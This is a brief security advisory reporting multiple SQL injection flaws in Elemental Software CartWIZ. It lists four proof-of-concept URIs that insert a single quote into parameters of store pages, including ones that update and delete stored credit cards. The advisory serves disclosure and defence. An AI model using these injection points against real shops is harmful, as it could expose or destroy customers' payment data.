Elemental Software CartWIZ Multiple SQL Injection Vulnerabilities

Elemental Software CartWIZ Multiple SQL Injection Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/cartwiz/store/tellAFriend.asp?idProduct='
http://www.example.com/cartwiz/store/viewSupportTickets.asp?sortType='&sortOrder=ticketNum&page=0
http://www.example.com/cartwiz/store/updateCreditCards.asp?id='
http://www.example.com/cartwiz/store/deleteCreditCards.asp?id='